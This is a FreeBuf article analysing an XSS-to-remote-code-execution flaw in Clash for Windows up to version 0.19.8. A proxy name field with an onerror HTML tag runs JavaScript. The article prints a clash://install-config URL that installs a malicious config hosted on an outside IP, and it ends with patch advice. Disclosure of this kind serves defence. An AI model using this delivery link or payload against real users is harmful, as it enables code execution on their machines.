官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
WhoamIXX- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
本文由
WhoamIXX 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
被誉为Windows上最好用的代理工具,今天Clash for windows的Github上显示了最新版本的更新,这就点燃了我强烈的好奇心,那就研究一波。
I Clash For windows 简介
Clash 是一个使用 Go 语言编写,基于规则的跨平台代理软件核心程序。Clash for Windows 是目前在 Windows 上唯一可用的图形化 Clash 分支。通过 Clash API 来配置和控制 Clash 核心程序,便于用户可视化操作和使用。Clash for Windows 免费客户端同时支持 Windows 和 Mac 平台,并且支持一键导入订阅配置文件.
II 漏洞分析
crash_for_windows_pkg 由 Electron 提供支持,经检测发现Clash for windows 代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令。"proxies"中的"name"字段嵌入html标签,"onerror"时触发语句执行。
III 漏洞详情
测试版本
构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令 (clash config 文件)
成功导入test.yaml
Note:另外一个利用方式: 也可以将恶意配置文件(test.yaml)放到互联网上并用 clash://安装
clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
切换到Proxies点击代理的配置即可触发RCE漏洞打开记事本
Note:经测试发现<=V0.19.8的版本都受影响,操作系统:Windows10
IV 修复建议:
更新到最新版本V0.19.10.
https://github.com/Fndroid/clash_for_windows_pkg/releases
已在FreeBuf发表 7 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
- 7 文章数
- 13 关注者